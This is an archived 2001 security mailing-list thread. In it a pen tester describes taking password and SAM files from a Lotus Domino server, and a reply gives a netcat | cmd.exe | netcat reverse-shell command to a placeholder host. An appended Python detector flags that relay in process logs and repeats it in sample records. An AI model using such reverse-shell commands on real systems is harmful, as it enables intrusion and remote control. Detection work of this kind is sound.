Re: Hacking Lotus Domino 5.0.5

From: 'ken'@FTU
Date: Mon Oct 15 2001 - 16:33:31 PDT


    I suspect from your email that your Domino server is on an NT box as 
    opposed to an AS/400.
    
    If it's a 400 you're somewhat out of luck because few, if any, tools exist 
    for 400 hacking.
    
    If it's NT here's an idea:
      If you can place a file on the machine put netcat on the machine. You 
    can then get a shell back with the command: nc foo.com [your inbound 
    port] | cmd.exe | nc foo.com [your outbound port]
    You can now send commands to your inbound port and watch the result on 
    your outbound port.
    
    You can always search for buffer overflows. If one is found you could 
    possibly execute commands, or do other stuff, within the server's 
    permission level.
    
    Hope this helps.
    
    'ken'
    
    renato.ettisbergerat_private wrote:
    
    > Hi
    > 
    > I'm doing a pen test for a client. They have many systems in the dmz,
    > including some nt/win2k boxes running IIS. Unfortunately, all IIS are
    > patched :-(. But I found a vulnerable Domino 5.0.5 Server. I was able to
    > download some nice files like names.nsf, the sam-file in winnt/repair and a
    > admin.nsf with all user names and passwords. I think, that's a finding :-),
    > but I want more.
    > Is there a way to get a shell? I'm able to create files on the server or at
    > least I can fill out a question form. Can I use this to create a file or
    > execute a command (I don't think so, but maybe...)? Or does anybody know
    > some other stuff, that I can do?
    > 
    > As you can see, I'm not a pro in Lotus Domino.
    > 
    > Thanks for your help
    > 
    > regards
    > Renato
    > ----------------------------------------------------------------
    > The information transmitted is intended only for the person or entity to
    > which it is addressed and may contain confidential and/or privileged
    > material.  Any review, retransmission, dissemination or other use of, or
    > taking of any action in reliance upon, this information by persons or
    > entities other than the intended recipient is prohibited.   If you received
    > this in error, please contact the sender and delete the material from any
    > computer.
    > 
    > 
    > ----------------------------------------------------------------------------
    > This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    > Service. For more information on SecurityFocus' SIA service which
    > automatically alerts you to the latest security vulnerabilities please see:
    > https://alerts.securityfocus.com/
    > 
    > 
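Added example, not part of the original message or thread: a defender-side check that scans process-creation records for the netcat | cmd.exe | netcat relay described in the reply above and reports which host ran it and the two remote endpoints involved. The log layout (`host=... cmdline=...`), the sample records, the port numbers and all function names are constructed assumptions.

```python
import re

NETCAT = {"nc", "nc.exe", "ncat", "ncat.exe", "netcat", "netcat.exe"}
SHELLS = {"cmd", "cmd.exe", "sh", "bash", "powershell.exe"}

def _stage(segment):
    """Split one pipeline stage into (lower-cased executable basename, args)."""
    parts = segment.strip().split() or [""]
    exe = re.split(r"[\\/]", parts[0].strip('"'))[-1].lower()
    return exe, parts[1:]

def _remote(args):
    """Return 'host:port' when the non-option args end in a host and a port."""
    pos = [a for a in args if not a.startswith("-")]
    if len(pos) >= 2 and pos[-1].isdigit():
        return f"{pos[-2]}:{pos[-1]}"
    return None

def relay_endpoints(cmdline):
    """Return (inbound, outbound) for netcat | shell | netcat, else None."""
    stages = [_stage(s) for s in cmdline.split("|")]
    for (a, a_args), (b, _), (c, c_args) in zip(stages, stages[1:], stages[2:]):
        if a in NETCAT and b in SHELLS and c in NETCAT:
            src, dst = _remote(a_args), _remote(c_args)
            if src and dst:
                return src, dst
    return None

def scan(lines):
    """Return (host, inbound, outbound) for every log line holding the relay."""
    hits = []
    for line in lines:
        m = re.search(r"host=(\S+) .*?cmdline=(.*)$", line)
        ends = relay_endpoints(m.group(2)) if m else None
        if ends:
            hits.append((m.group(1), *ends))
    return hits

# Constructed process-creation records; the field layout is an assumption.
SAMPLE_LOG = [
    r"2001-10-15T16:40:02 host=WEB01 user=SYSTEM cmdline=C:\temp\nc.exe foo.com 8080 | cmd.exe | C:\temp\nc.exe foo.com 8081",
    r"2001-10-15T16:41:10 host=WEB01 user=admin cmdline=cmd.exe /c dir C:\temp",
    r"2001-10-15T16:42:55 host=MAIL02 user=ops cmdline=nc -z -w 2 10.0.0.5 25",
    r'2001-10-15T16:43:30 host=DEV03 user=dev cmdline=type notes.txt | find "nc"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("shell relay on %s: commands from %s, output to %s" % hit)
```

Only the first record matches; a lone netcat port check and an ordinary pipe that merely mentions "nc" are not flagged.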
    
    
    
    
    



    This archive was generated by hypermail 2b30 : Mon Oct 15 2001 - 21:31:33 PDT